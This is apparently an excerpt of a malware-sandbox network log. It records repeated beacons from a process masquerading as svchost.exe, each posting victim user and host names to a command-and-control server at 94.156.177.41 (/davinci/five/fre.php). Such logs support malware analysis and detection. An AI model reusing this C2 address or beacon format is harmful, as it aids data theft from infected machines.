                        Connection: close
                        Nov 29, 2024 07:37:25.297010899 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:29.724714994 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.44974894.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:29.987917900 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:30.107975960 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:31.916888952 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:31 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.44974994.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:32.178077936 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:32.298013926 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:33.620527983 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:33 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.44975094.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:33.879084110 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:34.000360012 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:35.522377968 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:35 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.44975194.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:35.785371065 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:35.905770063 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:37.284110069 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:37 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.44975294.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:37.551649094 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:37.671797991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:39.136181116 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.44975394.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:39.394356012 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:39.516381025 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:40.913743019 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:40 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.44975494.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:41.178177118 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:41.298198938 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:42.665961981 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.44975594.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:43.007633924 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:43.127928019 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:44.435913086 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:44 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.44975694.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:44.706705093 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:44.826714993 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:46.112834930 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:45 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        21192.168.2.44975794.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:46.379575968 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:46.499557018 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:47.963159084 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:47 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        22192.168.2.44975894.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:48.226660967 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:48.348566055 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:49.835711956 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        23192.168.2.44975994.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:50.133806944 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:50.256361008 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:54.778409958 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:54 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        24192.168.2.44976094.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:55.053323030 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:55.174547911 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:56.550052881 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:56 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        25192.168.2.44976394.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:56.818681002 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:56.938795090 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:58.419599056 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:58 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.44976494.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:37:58.692344904 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:58.812352896 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:00.700906992 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:00 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        27192.168.2.44977094.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:00.958424091 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:01.082225084 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:02.367278099 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        28192.168.2.44977694.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:02.636234045 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:02.758234978 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:04.200182915 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        29192.168.2.44978294.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:04.457258940 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:04.577450991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:05.909101963 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:05 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        30192.168.2.44978894.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:06.186880112 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:06.307813883 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:07.784981966 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.44978994.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
                        Nov 29, 2024 07:38:08.058146954 CET246OUTPOST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:08.178167105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:12.701245070 CET193INHTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.44980594.156.177.41803300C:\Windows\SysWOW64\svchost.exe
                        TimestampBytes transferredDirectionData
